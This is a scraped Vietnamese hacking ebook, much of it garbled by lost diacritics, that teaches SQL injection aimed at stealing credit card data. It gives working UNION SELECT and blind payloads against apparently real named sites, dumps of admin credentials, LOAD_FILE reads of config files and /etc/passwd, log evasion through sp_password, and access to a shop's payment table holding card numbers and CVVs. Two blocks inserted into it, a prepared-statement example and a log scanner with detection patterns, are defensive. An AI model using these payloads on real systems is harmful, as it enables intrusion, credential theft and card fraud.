ebook hacking credit card version

Upload: dang-tan-dong

Post on 03-Jun-2018


  • 8/11/2019 eBook Hacking Credit Card Version

    1/69

    Ebook Hacking Credit Card

    Version 4

    -----

    It's a special version, whose title will be: Hieupc Returns

    Copyright by hieupc

    Email: [email protected]

    Yahoo ID: hieuitpc

    Motto: Life is a string of hard days; you have to learn to get through them before you can grow up and succeed. Don't lose heart; just think of them as life's challenges.

    Published: 09-09-2009

    Ebook author: Hieupc


    Foreword:

    Time really does fly: four years already, and hieupc's life has changed a great deal over that time. From a kid who knew nothing about computers, I suddenly knew a great many things about them, and I learned a lot, from how to speak to how to treat people, and by now I can more or less feel at ease that I can live well in this society. When I was small I dreamed of having a computer, and my parents bought me one as a surprise gift. At first I went online to read books and news and found so many new and strange things, and little by little I got to know people on the net. To this day I still remember who they were and what their nicknames were. If you ask me why I have what I have today, the answer is really quite simple: a never-ending effort to explore and learn. But I was also truly lucky to meet the elders of the computer-networking scene of that time, and that is how I came to have the fairly broad understanding I have now. I like writing books because I like sharing my knowledge with everyone, and I hope you will take in at least part of it from this Ebook. So always keep learning, put in the work, share in order to receive, and above all don't get discouraged.

    P/S: If you feel this Ebook is useful to everyone, please help Hieupc share it. Please email any comments and criticism to: [email protected].

    My Friends: Ly0kha, PxNam, J0hnnywalk3r, Yeuemdaikho, Kehieuhoc, Langtuhaohoa, Mr.saobang, Vampirevn, Thanhhuyleit, Thanhh83, Longnhi

    Note: In the articles below, some words are set in bold black, and the words in red are the ones to pay attention to.


    Table of Contents:

    I. Exploiting PHP Injection:

    1. What is PHP Injection?

    2. Exploiting PHP Injection thoroughly.

    II. Getting Root Server by Many Methods:

    1. Exploit technique: Get Root into MYSQL Server.

    2. Technique for taking over Admin rights via SA on MSSQL Server.

    3. Things to know about Localhack.

    III. How To Get These Important Information:

    1. How to find the Admin link.

    2. Getting the important information we need.

    IV. Exploiting By Tool, Scripts:

    1. Shell Scripts.

    2. Tools Hack.

    V. Special Things:

    1. How to fix SQL Injection, and other remediations.

    2. Preventing Localhack.

    3. SQL Injection practice.


    I. Exploiting PHP Injection:

    1. What is PHP Injection:

    From the server-side script point of view, PHP Injection is the term for a weakness that lets an attacker execute PHP code when the values passed in are not controlled. One example is input data that ends up being used in eval() or include().

    Example:

    // Vulnerable: the request parameter is concatenated into code that eval() runs.
    $myvar = 'somevalue';
    $x = $_GET['arg'];
    eval('$myvar = ' . $x . ';');

    2. Exploiting PHP Injection thoroughly:

    SQL Injection is an exploitation method based on the data exchange between the user and the web application. When the application does not check input values, an attacker can have unintended SQL queries executed against the database to change, add, view or delete data. Hackers usually exploit it by sending input values that make the server produce error messages, and then adapt them to the designer's original query. What if the web application has customized error pages, or no error page is returned at all? Try exploiting it with the method: blind SQL injection.

    Example:

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1

    The result returned is information from the database.

    But what happens if we add the mark:

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1

    The result returned is a blank page.


    Variant 1:

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 and 1=1

    => The page returns information from the database, the same as above.

    Variant 2:

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 and 1=2

    => No products appear.

    So we can see that the page returns two different results here. In variant 1 the added condition 1=1 (true) does not affect the result of the original query, so the information from the database is still displayed correctly; but with the condition added in variant 2, 1=2 (false), the original query evaluates to false, so no information appears on the page. Based on this, appended queries can be used whose outcome is received as true/false in order to obtain information about the system!

    Gischng ta khng bit trng v bng ca ng dng web ny l g?Vi li SQL Injection gy ra bi url trn ta xem thtruy vn (SQL) ca n liu c bao nhiutrng. Sd cn xc nh iu ny bi v khi chng ta dng UNION trong cu lnh SQL th slng trng ca hai cu lnh select phi trng nhau.

    Ta s dng lnh Order by v thng qua lnh ny n s lm n gin vic m s v nhanhchng hn.

    Xc nh c bao nhiu trng truy vn vi url:

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1

    C rt nhiu cch thc hin. y mnh sdng order by . Thc hin tng dn. Khi thc hin order by, nu trang web khng hin thli tc l slng trngvn cn, thc hin tng cho n khi no xut hin li tc l ta thc hin tm slng trng.

    V d:

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by1 -> vn cn bnh thng

    Kt qu:


    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by2 -> vncn bnh thng.

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by10 -> kt qu l trang trng, khng c ri.

    Vy l ta bit kt qu b li s ch nm trong khong t10 tr xung v vy ta th:

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by7 -> vn cn bnh thng

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by8 -> kt qu l trang trng, vy c ngha lsao, t nhin s 7 th thy cn bnh thng nhng khi ti s8 th kt qu l trang trng.

    Suy ra: s 7 l s m chng ta ang tm y.

    Nh vy truy vn SQL vi Website trn l 7 trng (field)n y c thiu tra phin bn SQL, User vi lnh sau:

    V d:

    Ch c du : - nhNu khi ta check SQL version m l: 4.5 hoc di 5.0 th coi nh ta phi m table v column.

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,3,4,5,6,7--

    Kt qu hin ra : mt li t y ta c th khai thc tip: (nh di hnh, li hin ra s 3 v s 4)

    Kim tra SQL Version xem sao:

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,version(),4,5,6,7--


    Kt qu hin ra: (tht may mn khi SQL version trn 5.0, v version ny ta c th query all table_name haycolumn_name cng mt lc.)

    V c th ta c th kim tra c nhiu information quan trng khc, da vo nhng cu lnh ny: version() , user(), database() , @@datadir , group_concat(schema_name) , table_schema ,

    ..+from+information_schema.schemata--

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=

    -1%20union%20select%201,2,user(),4,5,6,7--

    Kt qu hin ra:

    Ta cng c thlm cch ny gp nhng thng tincn thit: concat_ws(0x3a,version(),user(),database())

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7--

    No gi chng ta tip tc khai thc ly tables v columns:

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,group_concat(table_name),4,5,6,7%20from%20information_schema.tables--

    Kt qu: trang trng, vy c ngha l sao, i lc ta cng hay gp tnh trng ny, cch gii quyt l th no y.


    Ta nhthm: unhex(hex(vo trc group_concat nh. Th kt qu th no:

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,unhex(hex(group_concat(table_name))),4,5,6,7%20from%20information_schema.t

    ables--

    Kt qu:

    Trong PHP injection hay cn gi l Blind Injection ta phi Hex tableli khai thc ly columns t nhng tablequan trng nh: admin, users, accounts.Ti sao phi Hexv Magic_Quotesang ch : ON

    Sau khi, khai thc ly c ht tt c tables, Hieupc nhn thy site ny c mt table quan trng l: admin. Th khi

    thc xem sao: (table: adminc Hieupc Hex thnh: 61646d696e)

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,unhex(hex(group_concat(column_name))),4,5,6,7%20from%20information_schem

    a.columns where table_name=0x61646d696e--

    nh c "0xpha trc dng hexnh. Tng t ta cng phi unhex(hex( v i vi site ny th ta phi vy, mt ssite khc c l khng c unhex(hex( hoc c cng khng sao.

    Kt qu:

    Nh ta thy: 2 column quan trng nht: username, pass ca table:admin

    Bc k tip l query ly kt qu m ta t c:

    http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,unhex(hex(group_concat(username,0x7c,pass))),4,5,6,7%20from%20admin


    Kt qu:

    Nh vy ta c c:

    Username: cuongle

    Pass: cuongle

    ..v mt s user admin khc.

    Lu : 0x7cl du |ta dng ci ny d nhn v ly thng tin d dng hn, ci ny ta convert ra Hex y m. Khiquery ly thng tin t table nh trong bi nyl: admin chng hn th ta khng cn phi Hex lm g.N tht ngin phi khng, ging nh nhng cch khai thc m trong nhng cun Ebook trc cng c v cp n.

    No gi ta kim link admin vo xem sao: (thng th: admin, pcadmin, admin_login, admin.php.)

    Sau mt hi m mm, cui cng th link admin ca n l:

    http://www.hoanvustc.com/manager/gi ta th ng nhp vi username v pass hi ny query thxem sao.

    Kt qu: (n y l thnh cng ri nh)


    Some of Hieupc's experience:

    When exploiting blind SQL injection, the following functions prove useful:

    1. SUBSTRING(string, position, length): cuts a substring, e.g.:

    SUBSTRING('dbo', 1, 1) = d

    SUBSTRING('dbo', 2, 1) = b

    SUBSTRING('dbo', 3, 1) = o

    2. Lower(): converts characters to lowercase

    3. Upper(): converts characters to UPPERCASE

    4. ASCII(): converts a character to its corresponding ASCII code number

    5. If(condition, result1, result2)

    Ngoi ra ch thm:

    - Mt s li thng gp ca Mysql Injection:

    Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in

    C:\................ on line 37Li tr v l mt trang trng..

    - Ta c th s dng: Union select all, Union all select

    - Ta c th s dng table_schema xc nh c tablesca table_schema .

    http://www.website.com/shop.php?id=1+UNION+SELECT+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=hieupc (nh convert hieupc sang Hex hoc Asciinh.)

    - i khi ta hack khng m ra c link admin th ta c th query trc tip

    t database ly nhng thng tin nh: CC, Information, user, pass.(vn kim link admin s c trnh by bi vit tip theo).

    - Theo kinh nghim cho thy nu website config k s chn nhng hmnh: union, select, convert.lc ny ta c gng th bng cch thay vo l ch IN HOA v vit thng chen ln nhau. V d: UnIoN SelECt..

    - Mt iu th v l khi bn vo c admin panel ri nhng thng tinquan trng nh: credit card number, hay password ca customer li b mho hoc b hide i di dng ****, th ta c th sa code li hay cn gil dch ngc code t hideunhide(ci ny ch p dng trong trnghp bn c source code ca website ).

    - Mt s website secure cao hn th lc ta query ly table hoc columns hin ra trang trng hoc bo li th ny, ci ny chc potay ri:


    -Nu bn khai thc c user v pass ca admin m b m hoMD5, cth decode n y:

    http://www.th3-0utl4ws.com/tools/md5/md5_looker.php

    http://gdataonline.com/seekhash.php

    -Ngoi ra nu bn gp nh dng m ho l,bn phi lm sao kim ckey m ho ca n t mi c th dch ngc li.

    - i lc ta kim c link admin v c th login trc tip m khng cnuser v pass bng cch Bypass Login (ci ny s c trnh by bi vittip theo).

    - Ta c th s dng du +thay cho khong trng space, v d:union+all+select.

    - Trong bi Hieupc s dng: 0x7ctngtrng cho du | ta cng c th sdng nhng k t khc nh: du 2 chm. Mun convert t dng text

    sang Hex, ta vo trang web sau:

    http://www.string-functions.com/string-hex.aspx

    (ta s thm 0xsau mi string-hex). V d: table: admin sau khi convert thc: 61646d696ev sau khi thm 0xth c: 0x61646d696e, ly ciny avo cu lnh khai thc.

    - Hoc ta cng c th convert sang Asciithay v convert sang Hex. V d:table: adminconvert th ra: char(97,100,109,105,110)

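    - A little about the ASCII code table:

    The ASCII character set consists of 256 characters, distributed as follows:

    + the first 32 characters are non-printable control characters, for example the ENTER character (code 13) and the ESC character (code 27)

    + codes 32-47, 58-64, 91-96 and 123-127 are special characters such as the period, semicolon, parentheses, brackets, question mark .....

    + codes 48-57 are the 10 digits

    + codes 65-90 are the uppercase letters A->Z

    + characters 97-122 are the lowercase letters a->z

    + the ASCII codes are graphic characters.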

    - The case where error messages sent from the server are suppressed by putting the @ sign in front of the query call; in this form SQL Injection is very hard to detect. Example:

    // Errors are hidden by @, but $id still goes into the SQL text unchecked.
    $id = $_GET['id'];
    @mysql_query("SELECT * FROM user WHERE id=$id");

    Or error_reporting(0); is used at the top of the PHP code to hide errors.

    To identify this flaw, the mark cannot be added at the end of the query as above, because error display is blocked. In this case we add an equality after the query, as follows:

    http://web.com/user.php?id=1 and 1=1

    If the page result does not change after the expression above is added, we say the page is very likely to have a flaw that can be exploited.
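The query shown above, next to a form without the injection point, as an added example that is not from the ebook. It assumes PDO with the SQLite driver and a constructed in-memory `user` table so that it runs offline; the function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not from the ebook. Constructed in-memory data stands in
// for the `user` table that the page's query reads.
function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    // Raise exceptions instead of hiding failures with @ or error_reporting(0);
    // hiding errors does not remove the flaw, it only removes your own visibility.
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT)');
    $pdo->exec("INSERT INTO user (id, name) VALUES (1, 'alice'), (2, 'bob')");
    return $pdo;
}

// The page's pattern: request data concatenated into the SQL text.
// Kept only to show why the two probes give different answers.
function find_user_vulnerable(PDO $pdo, string $rawId): array
{
    return $pdo->query("SELECT id, name FROM user WHERE id=$rawId")
               ->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: validate the type first, then bind the value so it can
// never become part of the SQL grammar.
function find_user_safe(PDO $pdo, string $rawId): array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        // Log server-side (printable characters only); the caller gets an empty result.
        $shown = preg_replace('/[^\x20-\x7e]/', '?', substr($rawId, 0, 80));
        error_log('rejected non-integer id: ' . $shown);
        return [];
    }
    $stmt = $pdo->prepare('SELECT id, name FROM user WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The plain value and the two probe values from the page's text.
$pdo = open_demo_db();
foreach (['1', '1 and 1=1', '1 and 1=2'] as $probe) {
    printf("%-10s vulnerable=%d rows, safe=%d rows\n",
        $probe,
        count(find_user_vulnerable($pdo, $probe)),
        count(find_user_safe($pdo, $probe)));
}
```

With the concatenated query the two probes return different row counts, which is the true/false signal the text relies on; with validation and a bound parameter both probes are rejected identically and the rejection is logged.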

    -Ngoi ra mt s trang web m Hieupc tng hack, c dng du li nh

    sau: khi ta thm du vo sau th khng hin g hoc hin ra ch mt phnno ca trang web, lc ny ta th view source v s thy liSQLInjection.

    - View Source l mt th khng th thiu trong khi hack Web c bit lSQL Injection v mt s kiu hack khc nh: XSS, RFI, LFI.

    -Nu bn gp MYSQL version di 5 th phi m table v column quantrng ly c thng tin mnh cn nh, ta cng c th dng nhng toolscan tables hay columns. V d:

    - Trong mt vi trng hp ta cng c th s dng 1,1,1,1,1,1. Thay v1,2,3,4,5,6 trong cu lnh query SQL Injection.

    - i khi ta dng lnh order bynhng trang vn hon ton trng th cngha l ta phi query bng cch nh t s 1 cho n khi no hin li mithi. V d site ny:

    http://vn.lge.com/index.php?option=products&task=productsdetails&id=1 order by 1

    Order by 1 : vn l trang trng, vy l ti y ta hiu ri nn phi t nhs v m mm thi, v d:

    http://vn.lge.com/index.php?option=products&task=productsdetails&id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14--


    Kt qu:

    -Nu trong khi hack chng ta thm du saumt trang c nghi vn b li,m kt qu tr v l mt trang trng hon ton, th c th trang web dnh li PHP Injection.

    - Lnh union y chnh l lnh kt ni cc bng li vi nhau. Chng tacsdng cho n khi bit chnh xc c bao nhiu bng dliu nmtrong database.

    - Nu trng hp xut hin li ta c ththm limit 0,1v tng dn limit1,1 limit 2,1ly ht tt cthng tin cn thit.

    - Ta c th s dng concatthay cho group_concat

    -Ta c th s dng null bit chnh xc c bao nhiu bng ca website, v d:

    http://www.site.com/index.php?page=-1 union + + + select null, null/ *

    http://www.site.com/index.php?page=99999 union + + + select null, null/ *

    - Chng ta s s dng ln lt cc cu truy vn thng dng nh:

    +union select null, nullunion select null, null, nullunion select null, null, null, null

    - Xc nh nhanh c bao nhiu trng trong bng:

    Order by 100 .D nhin cc ct khng thno qu 100 ct c.Vi cchthc ny ta c thnhanh chng bit c bao nhiu ct.V c sai th n sbo li. V vy s rt d ta on c mt Site c khong bao ct haytrng trong bng.


    -Nu bn query ra qu nhiu table m cha hin ra c table quan trngcn tm, th phi lm sao y, lc ny ta s dng n hm ny:

    site.com/index.php?id=-1 union select1,2,substr(group_concat(table_name),100,300),3,4,5.. dnh cho nhng site bnhthng.

    site.com/index.php?id=-1 union select 1,2,unhex(hex(substr(group_concat(table_name),100,300))),3,4,5.. dnh cho nhng siteno kh chu nh site m Hieupc demo trn.

    tip tc xem nhng table tip theo th ta thay ln lt t 100ln 200ri 300..

    - Hoc ta cng c th dng LIMIT 1 OFFSET 44-- c th xem tipnhng thng tin cha hin ht, ta thay i t 44 n 45, 46.... l tableshoccolumns s hinra ht.V d:

    -

    - Tu thuc vo h qun tr CSDL m c cc c php ghi commentkhcnhau, v d:

    - Cn i vi sp_password th theo mnh bit th n c tc dng i

    password ca user. V d:

    Ngoi ra n c dng bn sau du comment trong cu lnh sql dng inject th trnh ghi log. Bi v khi thc thi mt cu lnh SQL thuc loi T-SQL th h qun tr s ghi nhn li s kin ny. Nu dng sp_password ns khng ghi nhn (c ghi nhn nhng khngghi li cu lnh SQL ca tacho d sp_password c sau du comment i vi SQL Server).

    - 1 union selectcurrent_user,null/*

    hoc1 union select user(),null/*

    Cc cu lnh nyc th cung cp thng tin v MySQL user hin ti, dng nh:Usernam@serverHoc bn cng c th on tn user bng Blind SQLi nu nh khng union c. Cccu lnh v d:1 and user() like root

    1 and mid(user(),1,1)1 and mid(user(),2,1)>m

    1 and ascii(substring(user(),1,1))>64


    union select1,2,3,4,5,6,7,concat(table_name,07c,table_schema,07c),9,10,11,12,13,14,15,16,17,18,19FROM information_schema.tables LIMIT 1 OFFSET 44--

    Microsoft Access: MySql : --, /* */ , /* , # trong bi vit ny cc bn ch Hieupc s dng du--Sql Server : -- , /* */ ,null byte %00

    Sp_password 'old_pass','new_pass',user'
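Seen from the defender's side, the request shapes in the list above (true/false probes, ORDER BY counting, UNION SELECT, information_schema reads, a trailing comment carrying sp_password) all pass through the web server's access log, whatever the database itself records. The following is an added example, not from the ebook; the log lines, addresses, paths and function names are constructed.

```php
<?php
declare(strict_types=1);

// Added example, not from the ebook. Flags query strings carrying the SQL
// injection markers discussed on this page. Matching happens after one round
// of URL-decoding and after /**/ comments and '+' are turned into spaces,
// since the page uses both in place of blanks.
const SQLI_MARKERS = [
    'boolean_probe'      => '/\b(?:and|or)\s+\d+\s*=\s*\d+/i',
    'order_by_probe'     => '/\border\s+by\s*\d+/i',
    'union_select'       => '/\bunion\s+(?:all\s+)?select\b/i',
    'schema_enumeration' => '/\binformation_schema\b|\bmysql\.user\b|\bsyslogins\b/i',
    'file_access'        => '/\bload_file\s*\(|\binto\s+(?:out|dump)file\b/i',
    'mssql_admin_proc'   => '/\bxp_cmdshell\b|\bsp_configure\b/i',
    'log_evasion'        => '/--\s*sp_password\b/i',
];

function normalize_query(string $rawQuery): string
{
    $text = urldecode($rawQuery);                            // %20 and '+' become spaces
    $text = preg_replace('~/\*.*?\*/~s', ' ', $text) ?? '';  // inline comments used as blanks
    return preg_replace('/\s+/', ' ', $text) ?? '';
}

// Returns the names of all markers found in one request target.
function markers_in_request(string $target): array
{
    $pos = strpos($target, '?');
    if ($pos === false) {
        return [];
    }
    $text = normalize_query(substr($target, $pos + 1));
    $hits = [];
    foreach (SQLI_MARKERS as $name => $pattern) {
        if (preg_match($pattern, $text) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Takes combined-log-format lines; returns [client => [marker => count]].
function scan_access_log(array $lines): array
{
    $byClient = [];
    foreach ($lines as $line) {
        if (!preg_match('/^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        foreach (markers_in_request($m[2]) as $marker) {
            $byClient[$m[1]][$marker] = ($byClient[$m[1]][$marker] ?? 0) + 1;
        }
    }
    return $byClient;
}

// Constructed sample: one ordinary request, then the probe sequence.
$sample = [
    '198.51.100.20 - - [01/Jan/2024:10:00:01 +0000] "GET /shop.php?id=12&sort=order_by_price HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?id=1%20and%201=2 HTTP/1.1" 200 310',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?id=1+order+by+8 HTTP/1.1" 200 0',
    '203.0.113.7 - - [01/Jan/2024:10:00:14 +0000] "GET /shop.php?id=-1/**/UnIoN/**/SelECt/**/1,2,3+from+information_schema.tables-- HTTP/1.1" 200 900',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /item.asp?id=1;exec%20sp_configure%20\'xp_cmdshell\',1--sp_password HTTP/1.1" 200 700',
];

print_r(scan_access_log($sample));
```

A single marker from one client is weak evidence; the same client moving from a boolean or ORDER BY probe to UNION SELECT and schema reads within minutes is the sequence worth alerting on.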


    NuSQL Version di 5 th sao?

    Theo mnh ngh th ch c cch l m tables v columns m mnh mun tm thi, hin nay cngc mt s cng c tool, script h tr scan.

    Sau y l bi vit ca tc gi: Seamoun HVA s gip bn nm c phn no k thut ny.

    u tin vi url:

    http://site.com/phpevents/event.php?id=1

    Thc hin thm du sau id=1. url tr thnh

    http://site.com/phpevents/event.php?id=1

    Ta pht hin rng phpvents c li SQL Injection vi thng bo sau:

    Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource inC:\xampp\htdocs\phpevents\event.php on line 37

    Xc nh c bao nhiu trng truy vn vi:http://site.com/phpevents/event.php?id=1

    Ln lt tath:

    http://site.com/phpevents/event.php?id=1order by1(


    Sau khi on c tn table l admin. Tip theo l d on tn trng trong bng admin mmnh ly c. C th on tn trng trong bng admin nh l username,uname,user, pass, passwd, password, pword, . (Tng t nh trn cng ty thuc vo kinh nghim kt hpvi vic crawl, spider ni dung web tm tn trng.). Tin hnh th nh sau:

    http://site.com/phpevents/event.php?id=1 union all select 1,username,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)http://site.com/phpevents/event.php?id=1 union all select 1,user,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)http://site.com/phpevents/event.php?id=1 union all select 1,uname,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

    Nh vy trng th nht ta on c l uname trong bng admin. Thc hin on trng mtkhu:

    http://site.com/phpevents/event.php?id=1 union all select 1,password,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)http://site.com/phpevents/event.php?id=1 union all select 1,passwd,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)http://site.com/phpevents/event.php?id=1 union all select 1,pword,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

    Nh vy ta on c trng mt khu l pword. Nh vy ta c thng tin y ly userv pass trong bng admin vi2 trng uname v pword + tn bng l admin

    Thc hin lnh:http://site.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 fromadmin

    Thc cht vi hai cu lnh trn th ta tm c user v pass nhng mun thc hin lnh :

    http://site.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 fromadmin

    c c tt c user v pass trong bng admin. Nu trng hp ny xut hin li ta c ththm limit 0,1v tng dn limit 1,1 limit 2,1 ly ht tt c user v pass

    S d thc hin cu lnh trn ng thi ly uname v pword khng cn phi thc hin 2 lnmi c c uname v pword.

    0x3a> du :. Concat s thc hin cng chui

    n y ta c thng tin uname v pword.

    Nu trng hp m kt ni n MySQL s dng user root th vic tm bng v trng d dnghn vi lnh sau.

    iu tra thng tin bng:http://site.com/phpevents/event.php?id=1 union all select 1,1,table_name,1,1,1,1,1,1,1,1,1,1,1,1 frominformation_schema.tables

    iu tra thng tin trng:http://site.com/phpevents/event.php?id=1 union all select 1,1,column_name,1,1,1,1,1,1,1,1,1,1,1,1 frominformation_schema.columns

    Ngoi ra trong mt s trng hp xut hin li khi thc hin khai thc c th s dng hmconvert, hex, khng b li khi khai thc nh:http://site.com/phpevents/event.php?id=1 union all select 1,1,unhex(hex(uname)),1,1,1,1,1,1,1,1,1,1,1,1 from admin


    II. Getting Root Server by Many Methods:

    1. K thut Exploit Get Root into MYSQL Server.

    Vn nm ch server MySQL cu hnh th no. V vy ta s s dng mt s cu lnh nhsau, di y l mt v d v mt site m Hieupc get root c vo MYSQL Server:

    union select 1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17,18,19

    Kt qu:

    union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19Kt qu: (SQL Version trn 5 nh, hn thit)

    union select 1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18,19Kt qu:

    union select 1,2,3,4,5,6,7,@@datadir,9,10,11,12,13,14,15,16,17,18,19

    Database ca n nm y: "/var/lib/mysql/"


    Gi ta kim tra tnh privileges ca MYSQL USER xem sao (ci ny quyt nh n get rootc hay khng):

    union select 1,2,3,4,5,6,7,update_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user

    union select 1,2,3,4,5,6,7,file_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user

    union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user

    Kt qu tr li u nh hnh di,N ngha l No, cn nu n hin Y ngha l Yes:

    Gi ta th vi cch ny xem sao vi user ca Mysql l: muum ta query c trn. (muu c convertsang Ascii l: CHAR(109, 117, 117) hoc cng c th convert sang Hex v kt qu convert sang Hex l:muu =

    0x6d7575

    union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109,117, 117)

    Kt qu l ch Y vi user = muu (vy l ta c quyn vi user=muuny):

    Bn cng c thkim tra quyn FILE trong bng trn m khng cn thm mnh where, tuy nhin Hieupc vnthm n vo v y l cch nhanh v d dng nht - khi chuyn sang Blind:

    1 and mid((select file_privfrom mysql.user where user=CHAR(109, 117, 117)),1,1)=a

    (ng c thm NULL y, v y khngphi l union select)

    Cch trn c th p dng cho c Mysql version 4.x v 5.xNu MySQL l 5.x ta cn c th xem quyn FILE ngay trong information_schema

    0 union select grantee,is_grantable FROM information_schema.user_privileges where privilege_type = file andgrantee like %username%

    Viblind:1 and mid((select is_grantable from information_schema.user_privileges where privilege_type = file and granteelike %username%),1,1)=Y


    hin th warning ny c th th cu lnh 0 AND 1=0

    Cch lm trn c hiu qu i vi hu ht mi website, tuy nhin nu thng bo li ca mysql btt th bn c th c gng on th mc cha web bng cch s dng lnh LOAD_FILE() load v c cc file cu hnh. Mts ng dn mc nh n file cu hnh:

    /etc/init.d/apache/etc/init.d/apache2/etc/httpd/httpd.conf/etc/apache/apache.conf/etc/apache/httpd.conf/etc/apache2/apache2.conf/etc/apache2/httpd.conf/usr/local/apache2/conf/httpd.conf/usr/local/apache/conf/httpd.conf/opt/apache/conf/httpd.conf/home/apache/httpd.conf/home/apache/conf/httpd.conf/etc/apache2/sites-available/default/etc/apache2/vhosts.d/default_vhost.include

    Cng cn ch xem h iu hnh ca webserver l *nix hay win m on cho tt

    Thng thng th mc gc cha web thng t :

    /var/www/html//var/www/web1/html//var/www/sitename/htdocs//var/www/localhost/htdocs/var/www/vhosts/sitename/httpdocs/

    Bn c th google tm thm. Thng thng bn c th ghi files ln tt c cc th mc mMysql server c quyn ghi ln, min l bn c quyn FILE. Tuy nhin Admin c th gii hn ccth mc c th ghi c t public. Xem thm tihttp://dev.mysql.com/doc/refman/5.1/s-options.html

    Ny gi chng ta tm hiu k cng. Gi ta th load_fileconfig.php xem ci no i vi Sitem ny gi ta ang c get root y:

    C:/Program Files/Web/config.phpconvert nguyn on ny sang Ascii nh, sau khi convert thc:

    char(67,58,92,80,114,111,103,114,97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81,76,83,101,114,118,101,114,53,46,48,92,68,97,116,97,92,99,111,110,102,105,103,46,112,104,112)

    Gith ci no(ch :user = muucng convert sang Ascii lun nh, muu= CHAR(109, 117,117)):

    union all select1,2,3,load_file(char(67,58,92,80,114,111,103,114,97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81,76,83,101,114,118,101,114,53,46,48,92,68,97,116,97,92,99,111,110,102,105,103,46,112,104,112)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from mysql.user where user=CHAR(109, 117, 117)


    Kt qun tng:

    Gi th ly username v password ny kt ni vo databse server xem sao , n y ta dng

    MySQL Query Browser connect database, ci ny ln google.com download v nh:

    Kt qu( connect thnh cng, khng bit shop ny c CC nhiu khng ta):

    Nhn hnh trn th ta thy: tblcart_paymentl c kh nng cha thng tin CC.

    Cm gic m get root c MYSQL server rt l cc bn , hu nh mnh c th lm c ttc mi chuyn nh Drop, Update, Delete, hay Insert thng tinMay mn thay user vpass MySQL ging ca WHM (Cpanel Root), hnh minh ho bn di:


    Check xem Shop ny c CC khng no (Xem ci ID cng nhiu y ch, shop ny chc ngon ,c CVV na ch):

    Kt qu nh Hieupc d on:

    Kinh nghim:

    Ngoi ra, ta c th dng lnh load_file view ci ny: /etc/passwd. V d:

    union select 1,2,3,4,5,6,7,load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119,100)),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)


    Kt qu (ch :nh convert c etc/passwordv user= muusang m Ascii nh):

    Ta cng c th view c:/etc/shadownu ta c quyn root trong tay, nu ly c pass cashadow bn nm c full quyn s dng server ri y , crack pass shadow = john171d,download trn google.com nh.

    Mt iu khc na l c th update nhngthng tin c sn,bng cch dng lnh: Update

    V d(ng qun convert sang Ascii nhnh muu.):

    update table_name set column_name=new value where column_name=value where user=muu

    Trng hp c quyn FILE, upload Backdoor bng cch nh sau:

